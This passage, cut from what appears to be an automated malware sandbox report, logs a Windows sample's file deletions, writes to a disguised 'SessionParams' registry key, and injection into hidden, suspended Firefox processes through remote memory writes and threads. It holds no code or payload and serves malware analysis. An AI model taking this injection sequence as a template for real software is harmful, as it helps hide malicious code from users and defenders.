| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx3 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx4 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx5 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx6 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx7 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx8 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx9 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx10 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx11 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF7F5.tmp | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\mskfp32.ocx | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx12 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx13 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx14 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx15 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx16 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx17 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx18 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx19 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx20 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\xx21 | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Local\Temp\~fgF844.tmp | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\msvcrtd.tlb | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | - |
|
1 | |
| Delete | C:\Users\EEBsYm5\AppData\Roaming\HELP\\system32\olestdmp.ocx | - |
|
1 |
Registry (160)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
3 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
3 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CLASSES_ROOT\http\shell\open\command | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
3 | |
| Create Key | HKEY_CLASSES_ROOT\http\shell\open\command | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
3 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CLASSES_ROOT\http\shell\open\command | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
3 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CLASSES_ROOT\http\shell\open\command | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
3 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Timout, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IsActive, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = BSlp, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = SDCnt, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = EmtParam, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IListLen, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IList, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Installed, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastId, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = NTries, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LCValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISRValue |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, data = 136 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, data = 154 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Gdx, data = 255 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Pdx, data = 255 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISRValue |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\http\shell\open\command | data = "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1", type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, data = 136 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Gdx, data = 255 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 255 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, data = 154 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Pdx, data = 255 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 255 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\http\shell\open\command | data = "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1", type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, data = 136 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Gdx, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, data = 154 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Pdx, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\http\shell\open\command | data = "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1", type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, data = 136 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Gdx, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, data = 154 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Pdx, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\http\shell\open\command | data = "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1", type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, data = 136 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Gdx, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, data = 154 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Pdx, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Gdx, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Pdx, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 1525007642, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Gdx, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Pdx, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 1525011951, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Gdx, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Pdx, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 1525016841, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Gdx, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FGcnt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Pdx, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = FPcnt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 1525021544, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (8)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | c:\program files\mozilla firefox\firefox.exe | os_pid = 0xed8, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | c:\program files\mozilla firefox\firefox.exe | os_pid = 0xfdc, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | c:\program files\mozilla firefox\firefox.exe | os_pid = 0x840, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | c:\program files\mozilla firefox\firefox.exe | os_pid = 0x7a4, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Open | c:\program files\mozilla firefox\firefox.exe | desired_access = PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\firefox.exe | desired_access = PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\firefox.exe | desired_access = PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\firefox.exe | desired_access = PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 |
Thread (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | c:\program files\mozilla firefox\firefox.exe | proc_address = 0x50202, proc_parameter = 342016, desired_access = THREAD_ALL_ACCESS |
|
1 | |
| Create | c:\program files\mozilla firefox\firefox.exe | proc_address = 0x150202, proc_parameter = 1390592, desired_access = THREAD_ALL_ACCESS |
|
1 | |
| Create | c:\program files\mozilla firefox\firefox.exe | proc_address = 0x50202, proc_parameter = 342016, desired_access = THREAD_ALL_ACCESS |
|
1 | |
| Create | c:\program files\mozilla firefox\firefox.exe | proc_address = 0x50202, proc_parameter = 342016, desired_access = THREAD_ALL_ACCESS |
|
1 |
Memory (12)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | c:\program files\mozilla firefox\firefox.exe | address = 0x50000, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 14348 |
|
1 | |
| Allocate | c:\program files\mozilla firefox\firefox.exe | address = 0x150000, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 14348 |
|
1 | |
| Allocate | c:\program files\mozilla firefox\firefox.exe | address = 0x50000, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 14348 |
|
1 | |
| Allocate | c:\program files\mozilla firefox\firefox.exe | address = 0x50000, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 14348 |
|
1 | |
| Protect | c:\program files\mozilla firefox\firefox.exe | address = 0x50000, protection = PAGE_EXECUTE_READWRITE, size = 14348 |
|
1 | |
| Protect | c:\program files\mozilla firefox\firefox.exe | address = 0x150000, protection = PAGE_EXECUTE_READWRITE, size = 14348 |
|
1 | |
| Protect | c:\program files\mozilla firefox\firefox.exe | address = 0x50000, protection = PAGE_EXECUTE_READWRITE, size = 14348 |
|
1 | |
| Protect | c:\program files\mozilla firefox\firefox.exe | address = 0x50000, protection = PAGE_EXECUTE_READWRITE, size = 14348 |
|
1 | |
| Write | c:\program files\mozilla firefox\firefox.exe | address = 0x50000, size = 14348 |
|
1 | |
| Write | c:\program files\mozilla firefox\firefox.exe | address = 0x150000, size = 14348 |
|
1 | |
| Write | c:\program files\mozilla firefox\firefox.exe | address = 0x50000, size = 14348 |
|
1 | |
| Write | c:\program files\mozilla firefox\firefox.exe | address = 0x50000, size = 14348 |
|
1 |
Module (393)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
13 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
5 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
2 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Load | Advapi32 | base_address = 0x76700000 |
|
1 | |
| Load | iphlpapi.dll | base_address = 0x74130000 |
|
1 | |
| Load | WinInet.dll | base_address = 0x76600000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x77830000 |
|
1 | |
| Load | Advapi32.dll | base_address = 0x76700000 |
|
4 | |
| Load | psapi.dll | base_address = 0x77c70000 |
|
4 | |
| Load | CABINET | base_address = 0x72dc0000 |
|
1 | |
| Load | CABINET | base_address = 0x72d70000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
34 | |
| Get Handle | c:\windows\system32\gorctexxzx.exe | base_address = 0x11d0000 |
|
1 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x77ec0000 |
|
4 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
7 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
4 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
17 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
25 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
11 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
7 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
